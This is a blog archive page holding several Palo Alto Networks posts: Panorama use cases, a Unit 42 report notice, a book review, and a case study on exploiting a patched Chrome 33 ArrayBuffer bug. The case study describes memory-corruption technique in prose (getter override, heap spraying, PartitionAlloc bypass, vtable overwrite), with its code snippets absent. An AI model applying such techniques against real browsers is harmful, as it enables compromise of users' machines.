3 Use Cases for Panorama

Did you know that you can find use cases for our products on our Technical Documentation portal? Our use case examples provide realistic scenarios and/or topologies that display a complete start to finish configuration. Besides showcasing the primary capabilities of the product, they highlight features that may be overlooked or that complement each other.

In this post, we share 3 use cases for Panorama.

1. Use Case: Configure Firewalls Using Panorama

This use case is based on a scenario where you want to use Panorama in a high availability configuration to manage a dozen firewalls on your network: you have six firewalls deployed across six branch offices, a pair of firewalls in a high availability configuration at each of two datacenters, and a firewall in each of the two regional head offices.

To read more about the workflow for designing a central management strategy for this scenario, see Use Case: Configure Firewalls Using Panorama.

2. Use Case: Monitor Applications Using Panorama

This example takes you through the process of assessing the efficiency of your current policies and determining where you need to adjust them to fortify the acceptable use policies for your network. The use case provides information on how to analyze traffic data from applications and also provides suggestions on what changes to make to your policy configuration.

For more information, see Use Case: Monitor Applications Using Panorama.

3. Use Case: Respond to an Incident Using Panorama

This use case traces a specific incident and shows how the visibility tools such as incident notifications, threat logs, WildFire logs, and data filtering logs on Panorama can help you respond to the report. The use case also provides suggestions on updating the security policy following the analysis of an incident.

For more information, see Use Case: Respond to an Incident Using Panorama.

Want more use cases?

To find use cases for other products, select Use Case from the Information Type search facet on the Document Search.

Have a specific use case that you think we should document? We’d love to hear about it! Email us at documentation@paloaltonetworks.com.

Happy reading!

Your friendly Technical Publications team

[Palo Alto Networks Blog]

Google Chrome Exploitation – A Case Study

In this write-up, we will present several techniques used in exploiting a vulnerability in Google Chrome, and the various difficulties presented by its security mechanisms and considerations. We also offer some reflections regarding how some of the techniques used were made irrelevant by mitigations introduced since.

The exploit was developed to exploit a bug in Chrome 33, a winning submission to Pwn2Own 2014 by geohot, which later also awarded him the Best Client-Side Bug pwnie award.

The Bug

The vulnerability existed in Chrome’s implementation of ArrayBuffers, and is described in some detail in this issue page in the Chromium repository, along with an impressively concise exploit implemented by geohot himself.

This information was unavailable when we were researching the submission, so we had to make do with the code diff.

To keep things short, let’s just take a look at the relevant fix. Surprisingly, the vulnerability and the fix were in the internal JavaScript code used by the V8 engine, and not in a native component:

What we’re seeing here is the code that would be invoked whenever a Typed Array of any sort (Uint32/16/8 etc) is constructed on top of an existing ArrayBuffer instance.

On the left, we see that before the fix, the bufferByteLength is determined by reading the byteLength field of the underlying instance.

On the right, we see that the length is now retrieved via a call to %ArrayBufferGetByteLength, which denotes a native function call.

This Byte Length is later used to calculate the element length of the new Typed Array (byteLength/sizeof(element).

The issue then lies with the user’s ability to somehow control the byte length field of an ArrayBuffer. Amusingly, this is accomplished by simply overriding the byteLength getter for an ArrayBuffer instance.

Consider this code snippet:

An ArrayBuffer 0x20 bytes in size is instantiated. Its byteLength getter is then overridden using the __defineGetter__ method.

If you refer to the fixed code above, the issue becomes clear- you can trick the browser into creating a Typed Array of arbitrary size, based on an ArrayBuffer instance of particularly small size.

This is a remarkably elegant bug that takes you directly to relative full memory control.

Exploitation

So, we have an Array object which spans the entire 32bit memory space, enabling us read/write access.

In order to leverage this into code execution we’ll need to accomplish two objectives:

  1. Discover the location of our Array object in memory, in order to upgrade our relative r/w into full blown absolute memory r/w.
  2. Control EIP: Find a function pointer to corrupt, preferably a vtable of an object we can control.

These two steps are somewhat trivial in other browsers, but Chrome follows several security oriented design principles which make exploitation much more difficult.

PartitionAlloc

PartitionAlloc is a feature of Chromium’s WebKit fork – Blink.

It serves the purpose of creating memory sterility by partitioning heap allocations according to their purpose and nature – it avoids juxtaposing metadata or control data with buffer and user-input data, which is rightfully perceived to be more vulnerable.

There are 4 partitions:

  1. Object Model Partition (Element objects etc)
  2. Renderer Partition
  3. Buffer Partition (Where an ArrayBuffer or a string would be allocated)
  4. General Partition

PartitionAlloc maintains several allocation “entities”, from small to large – buckets, superpages and extents.

Super-pages are the building blocks of a partition, and are 0x200000 bytes in size each; an extent describes a sequence of super-pages.

A partition is composed of one or more extents.

Each super-page is transparently divided into buckets which are selected according to the size of a requested allocation by “order” and size.

On top of that, each super page has “guard” areas, which prevent an attacker from sequentially reading/writing/overflowing memory:

Specifically, a super-page comprises a metadata page, an actual data area (0x1f8000 bytes in length) and several guard areas (reserved, inaccessible pages).

What this means for us is that even though we have full relative read, we can’t just go around reading memory freely, since our faulty ArrayBuffer will be located inside one of these 0x1f80000 byte areas surrounded by reserved pages.

Worse than that, since PartitionAlloc is well implemented and enforced throughout the project – we are unable to allocate any object with a vtable in our proximity.

Basing our buffer

So, we know we have an array object located somewhere in memory, from which we can read the entire memory space relative to our buffer, but since we don’t know its base, we can’t convert this into absolute r/w.

The solution we came up within order to overcome this, given PartitionAlloc’s obstacles, was to create an object in near vicinity to our faulty buffer, and then spray a significant amount of items which point back to this object.

Both the single object and the sprayed pointers to it would have to be allocated in the buffer partition, same as our faulty array.

This is done by creating a simple string with similar size to our faulty ArrayBuffer, thus placing it in the same or adjacent bucket, and then spraying a moderate amount of attribute objects, with different names but the same value – our string.

The purpose of this is to get Chrome to allocate a few more super-pages, directly following the super-page we’re in, and read a pointer to the string adjacent to us from there.
Crudely depicted as follows:

By blindly reading 0x200000 bytes ahead (super-page size), we can read the attribute pairs created and heuristically infer the absolute address of the attribute we created.

Then, by scanning the memory near us, we can attempt to infer the relative offset of the attribute string from our array buffer. Combining the absolute address of the attribute string with its distance relative to us allows us to calculate our address in memory, completing objective #1.

This is the code that achieves the condition described and resolves the location of the corrupted buffer, allowing us to set up absolute r/w abstracts.

Gaining execution

Our next objective is to gain execution by overriding a vtable for some object.

We actually broke this objective into two subtasks – leaking a pointer and overriding a vtable.

We’ve already established that we’ll have difficulty finding a pointer in our partition.

Ironically, the metadata page of the partition itself solves this issue.

Since we know how partitions are formed in Chrome 33, we can apply some more heuristic logic to bring us to the metadata page of our partition (exactly 1 page up from the super-page base), which happens to contain a few bucket pointers:

Since we don’t know exactly where we are relative to the super-pages base (not exactly accurate since we already know our absolute location), we resort to scanning backwards at 0x10000 intervals, plus a constant 0x1028 offset.

We know when we’ve found a bucket pointer once we find a value which repeats itself 0x20 ahead several times.

At this point we’ve accomplished half of our second objective, but this doesn’t really help us gain code execution.

The approach we took from here on was to simply spray a large amount (400MBs or so) HTMLDivElement objects, which we then tried to overwrite by accessing a constant address.

This sort of makes the previous leak redundant, but we decided to show it anyway since it opens up a few interesting options for exploitation. We’ll discuss those in a moment.

Naturally this has a lot of disadvantages, chief among which is the fact that these Divs would be allocated in the DOM partition, and partition bases are randomized, reducing our chances of success somewhat.

Maneuvering around the Chrome memory space

A more sophisticated approach exists, but unfortunately it relies on changes that were only introduced after this bug was fixed.

We tested this method by artificially creating the same corrupt ArrayBuffer condition in a newer version of Chrome (36 was the most recent at the time) using a debugger.

It involves reliance on an interesting detail of the PartitionAlloc structures, namely the invertedSelf member which exists in the PartitionRootBase struct:

Being a static struct, the PartitionRootBase for each partition would be located in chrome_child’s data section.

Since we have arbitrary r/w access and a pointer to chrome_child’s base, we can definitely find these structures by once again applying a simple heuristic.

The invertedSelf field is located at offset 0x68, so any value which corresponds to ~value == &value – 0x68 will highly likely be a PartitionRootBase struct.

Indeed, this function returns exactly 4 matches, one per PartitionRootBase.

Finding the Object Model Partition can then be accomplished by creating a moderate amount of Divs, enough to fill one super-page of its partition with HTMLDivElement objects, and scanning each partitions’ currentExtent looking for the pattern created by these 0x34 byte size objects.

Once we find the HTMLDivElement, it’s a simple matter of overriding a vtable and iterating over all the Divs we allocated and calling a specific method.

Using this method it’s possible to achieve fairly high reliability with a very small memory footprint.

Conclusion

All in all, exploitation in Chrome is very challenging. Even once all of this has been accomplished, you still need to employ a sandbox bypass in order to achieve full exploitation.

In addition, some of the methods described here are no longer relevant. Specifically, it seems that the Chromium developers have added an additional layer of protection by fragmenting super-pages into writable and reserved pages even within the 0x1f8000 byte area, making resolving our buffers address even harder.

Google Chrome incorporates security considerations in the design of the browser, and significantly so, to a very impressive degree.

Unfortunately, not all software vendors align themselves to the Chromium project’s standards. Palo Alto Networks Traps acts to prevent several types of attacks, even those that may circumvent or overcome mechanisms such as in Chrome, fortifying existing defenses while adding significant additional mitigation mechanisms. Learn more about Advanced Endpoint Protection here.

References

[Palo Alto Networks Blog]

Unit 42 Explores Malware Attack Vectors in Key Industries

This week Unit 42 released its first Threat Landscape Review, looking at how malware trends affect key industries, from healthcare to high tech, around the world, and the particular persistence of the Kuluoz, or Asprox, campaign.

This infographic represents some of the key data from the full report, which you can download from the Unit 42 page. Does anything shown here surprise you?

[Palo Alto Networks Blog]

The Cybersecurity Canon: Where Wizards Stay Up Late

The Cybersecurity Canon is official, and you can now see our website here. We modeled it after the Baseball or Rock & Roll Hall-of-Fame, except for cybersecurity books. We have 20 books on the initial candidate list but we are soliciting help from the cybersecurity community to increase the number to be much more than that. Please write a review and nominate your favorite. 

The Cybersecurity Canon is a real thing for our community. We have designed it so that you can directly participate in the process. Please do so!

Book Review:  Where Wizards Stay Up Late: The Origins of The Internet (1996) by Katie Hafner

This review was written by Bob Clark, a member of the Cybersecurity Canon committee. Bob is a cyber operational lawyer for the Army Cyber Institute, United States Military Academy in West Point, New York, taking over these duties from his position as Distinguished Professor of Law (Cyber) at the Naval Academy. A career military officer and attorney, he has over 20 years of experience within the Department of Defense, having served as its counterdrug command as well as numerous other challenging positions. Read Bob’s full bio, and those of our other Committee members, on the Cybersecurity Canon home page here.

Executive Summary

This book chronicles the true early beginnings of the Internet and the many hard-working engineers and computer scientists along the way that designed and built it from the ground up. Cybersecurity practitioners across the spectrum today, from policy wonks all the way over to the deep-level geek malware researchers, will get a kick out of learning about the eccentric personalities of the people that built the Internet and their robust designs that provided a catalyst to the greatest economic and social change engine ever invented. For the youngsters out there, this is a history lesson. Be quiet and take your medicine. You need to know this. Trust us. For the old timers, you have heard most of this stuff before in drips and drabs. Wizards will put it altogether for you. You should have read this by now.

Introduction

I am not a techie. I believe it is “chic to be geek” but I am not a full-fledged geek. There are a few things you must realize. First, I am under “orders” to write this review. OK, so maybe not technically under “orders” to write this. But as a member of the Cybersecurity Canon Committee and the only lawyer in the group, I am the committee member most likely to write a review for books that fall into the non-technical category such as history where Wizards firmly settles. Next, I am part-geek, but still being only part geek I wanted to reference and use many other reviewers’ comments in order to insure a fair review of this material.

In Where Wizards Stay Up Late the Amazon.com reviewers overall rated it a 4.5 out of 5 stars with 61 out of 96 giving it the top marks of 5 stars.  And, to summarize many of those reviews, this is a good book if you are in the field or thinking about studying the subject. If not, then as one reviewer said, it may feel more like you are reading a textbook instead of being drawn into a page turning read. Cybersecurity Canon candidate books are supposed to be essential to the cybersecurity practitioner. I would classify how the Internet got started as being related to our field.  With that said, the origins of the Internet are extremely complex with “many fathers,” as Hafner puts it. Explaining this complexity requires an intelligible history that connects the technology story to the people that invented the technology.

The Story

After the launch of Sputnik President Eisenhower’s (already developed) passion for “his scientists” increased.  When he was told, “all scientists are Democrats” he replied, “I don’t believe it, but anyway, I like scientists for their science and not their politics.”

On January 7, 1958, Eisenhower sent a message to Congress requesting startup funds for the establishment of the Advanced Research Projects Agency (ARPA) recognizing, as Hafner explains, “the need for single control in some of our most advanced development projects.” Things looked rosy for the new agency: grandiose budgets, plans developed and flourished, right up until a little agency called NASA showed up, enacted under law, and gutted ARPA’s budget and programs.

Hafner writes, “Aviation Week called the young agency a dead cat hanging in the fruit closet.” So the staff of ARPA decided to tap into university research projects and focus on the “far-out” research. The universities responded sensing that dollars would flow their way to conduct “high-risk, high-gain” research. But what fell into ARPA’s lap, and more importantly its funding, was the upkeep of an Air Force computer, the Q-32.

It was recognized that, as Hafner explains, “computers, as they related to command and control, might one day provide high-speed, reliable information upon which to base critical military decisions. That potential, largely unfilled, seemed endlessly promising.” That identification of a government mission that no one else was doing sent ARPA on its way to develop not only computers and networks for the underlying funding requirements of a network for military command and control, but as scientists and university researchers, to develop the open and collaborative research networks for their peers.

As the review from Publishers Weekly points out,

While the book attempts to debunk the conventional notion that ARPANET was devised primarily as a communications link that could survive nuclear war (essentially it was not), pioneer developers like Paul Baran (who, along, with British Scientist Donald Davies devised the Internet’s innovative packet-switching message technology) recognized the importance of an indestructible message medium in an age edgy over the prospects of global nuclear destruction.

About the People

The story follows those pioneers from ARPA and the engineering firm of Bolt, Beranek and Newman, as well as dozens others that combined hardware and software to establish the ARPAnet and send us on our way to the Internet. With so many “Internet fathers,” how can a review capture them all?  The book does a great job recognizing many of those that were behind this adventure. And like our founding fathers, what is amazing is their age and their unique opportunity to be “engineering pioneers and discoverers.”

The idea of graduate students or young “new” engineers working on this equipment with their unsupervised responsibilities seems totally unimaginable, particularly in today’s age of established firms with government contracts and oversight. Wizards does a good job explaining their contributions and admirably lends a little context to their personalities, their drive, and their ability (or lack thereof) to be a team player.

About the Tech

So you want to learn about this technology in this period?  This is the book for you! The description of the hardware and software development is well done and detailed.  I know more about IMPs now than I probably ever really wanted to and I think this is where the book makes its mark.  If you are in this business and want to dive into the technological development of the ARPAnet and its protocols, without pulling out the IEEE white papers or RFCs, this is for you.

Conclusion

This is a worthy book for inclusion in the Cybersecurity Canon nomination list for both the techies in the community and the non-techies. For the non-techies in the crowd  — policy-wonks, lawyers, etc. – Wizards will help you understand enough about the technology that will enable you to converse with techies at some level.

While I agree with other reviewers I’ve seen who say they wish it read better as a story, Wizardsdoes provide a great understanding of the technology and gives you a feel for the pioneers that made it happen.  And there is no better way to find acceptance into a community that will shun you without the appropriate bona fides (either through education or work experience) then to learn to speak the technology and know the names and backgrounds of the pioneers and giants in this field.  This book will definitely give you that information.  For the techies in the group, you are going to get a birds-eye view of how the engineers conceived and implemented the beginnings of the Internet.

References

Hafner, Katie, “Where Wizards Stay Up Late” of Simon & Schuster, iBooks. Published by Touchstone, Rockefeller Center, 1230 Avenue of the Americas, New York, NY 10020.  Copyright © 1996 by Katie Hafner and Matthew Lyon.

[Palo Alto Networks Blog]

English
Exit mobile version